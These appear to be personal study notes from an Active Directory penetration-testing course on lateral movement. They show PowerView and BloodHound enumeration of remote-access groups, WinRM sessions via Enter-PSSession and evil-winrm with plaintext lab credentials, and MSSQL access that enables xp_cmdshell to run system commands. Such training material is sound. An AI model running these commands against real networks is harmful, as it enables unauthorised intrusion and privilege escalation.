16 - Privileged Access

- Once we gain a foothold in the domain, our goal shifts to advancing our position further by moving laterally or vertically to obtain access to other hosts, and eventually achieve domain compromise - If we don't have local admin rights on any hosts yet, we can still move around the domain with RDP, PSRemoting or WinRM, or MSSQL Server - We can do this easily with `BloodHound`, where the edges can so us what type of remote access privs a user has ![[images/Pasted image 20251104150227.png]] - We can also user `PowerView` or built-in tools # Enumerating Remote Desktop Users Group - We can use `Get-NetLocalGroupMember` with `PowerView` to enumerate members of the `Remote Desktop Users` group on a given host - This enables access to the given host via RDP - Below all Domain Users are part of the `Remote Desktop Users` group - This is common on Remote Desktop Services or jump hosts ```powershell PS C:\htb> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users" ``` ![[images/Pasted image 20251104152650.png]] # Enumerating Remote Management Users Group - We can also use `Get-NetLocalGroupMember` with `PowerView` to enumerate members of the `Remote Management Users` group on a given host - This enables access to the given host via WinRM ```powershell PS C:\htb> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users" ``` ![[images/Pasted image 20251104152700.png]] # Enumerating Remote Groups with Bloodhound - Startup `BloodHound` GUi on Kali host ![[images/Pasted image 20251104153310.png]]![[images/Pasted image 20251104153322.png]] - Run `SharpHound.exe` on Windows host and move ZIP to Kali host![[images/Pasted image 20251104153348.png]] - We can simply search for group names or user cypher queries ![[images/Pasted image 20251104154517.png]] # Establish a WinRM Session from Windows - Use the PowerShell `Enter-PSSession` cmdlet ```powershell PS C:\htb> $password = ConvertTo-SecureString "Klmcargo2" -AsPlainText -Force PS C:\htb> $cred = new-object System.Management.Automation.PSCredential ("INLANEFREIGHT\forend", $password) PS C:\htb> Enter-PSSession -ComputerName ACADEMY-EA-MS01 -Credential $cred [ACADEMY-EA-MS01]: PS C:\Users\forend\Documents> hostname ACADEMY-EA-MS01 [ACADEMY-EA-MS01]: PS C:\Users\forend\Documents> Exit-PSSession PS C:\htb> ``` # Establish a WinRM Session from Linux - Use `evil-winrm` ```shell-session gem install evil-winrm #installs evil-winrm evil-winrm #shows the help menu evil-winrm -i 10.129.201.234 -u forend #attempt to establish a winrm session to the target host as the specified user ``` # Enumerating MSSQL Instances from Windows - Use `PowerUpSQL` to enumerate MSSQL instances ```powershell PS C:\htb> cd .\PowerUpSQL\ PS C:\htb> Import-Module .\PowerUpSQL.ps1 PS C:\htb> Get-SQLInstanceDomain ``` ![[images/Pasted image 20251104155729.png]] - Use `Get-SQLQuery` to authenticate to the MSSQL instance ```powershell PS C:\htb> Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'Select @@version' VERBOSE: 172.16.5.150,1433 : Connection Success. Column1 ------- Microsoft SQL Server 2017 (RTM) - 14.0.1000.169 (X64) ... ``` # Enumerating MSSQL Instances from Linux - Authenticate to the MSSQL instance using `mssqlclient.py` from the `impacket` suite ```bash mssqlclient.py #shows help menu mssqlclient.py INLANEFREIGHT/[email protected] -windows-auth #authenticates to MSSQL instance ``` ![[images/Pasted image 20251104160313.png]] ```bash SQL> help #shows help menu SQL> enable_xp_cmdshell #enables execution of OS commands xp_cmdshell whoami /priv ``` ![[images/Pasted image 20251104160410.png]]